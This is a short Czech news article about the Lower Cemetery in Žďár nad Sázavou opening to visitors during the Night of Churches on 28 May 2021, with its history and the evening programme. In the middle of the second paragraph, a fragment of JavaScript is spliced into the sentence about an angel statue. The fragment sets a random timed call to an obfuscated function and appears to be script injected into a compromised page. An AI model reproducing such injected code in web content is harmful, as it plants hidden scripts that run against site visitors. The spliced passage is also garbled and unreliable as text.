Rainbow page separator

Při Noci kostelů mohou zájemci opět zavítat na Dolní hřbitov

Čtvrtek, 27. Květen 2021

Žďár nad Sázavou / Také Dolní hřbitov se v rámci Noci kostelů, k níž se žďárská „zámecká“ farnost připojí v pátek 28. května, otevře návštěvníkům. Jindy zřídka přístupnou památku si budou moci s výkladem průvodce prohlédnout v době od 18 do 20 hodin. Barokní hřbitov se třemi kaplemi byl coby dílo architekta Jana Blažeje Santiniho – Aichla zbudovaný na popud opata Václava Vejmluvy v roce 1709 v souvislosti s nebezpečím morové epidemie. O zhruba půl století později byl hřbitov rozšířen prostřednictvím čtvrté kaple.
Zatravněný hřbitovní areál, odkud byly již před dlouhou řadou let vymístěny hroby, mimo zrestaurovaných originálů soch z nedalekého mostu nyní „hlídá“ i socha andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}anděla posledního soudu s pozounem z dílny Řehoře Thenyho.
Kromě zpřístupněného Dolního hřbitova se při „zámecké“ Noci kostelů uskuteční rovněž program v bazilice Nanebevzetí Panny Marie, který začne patnáct minut po sedmnácté hodině mší svatou. O půl sedmé večer pak bude zahájena samotná Noc kostelů, při níž se představí dětská schola z Kláštera, přičemž chybět nebude přednáška o mniších cisterciácích, gregoriánský chorál či závěrečná modlitba u zámecké Studniční kaple.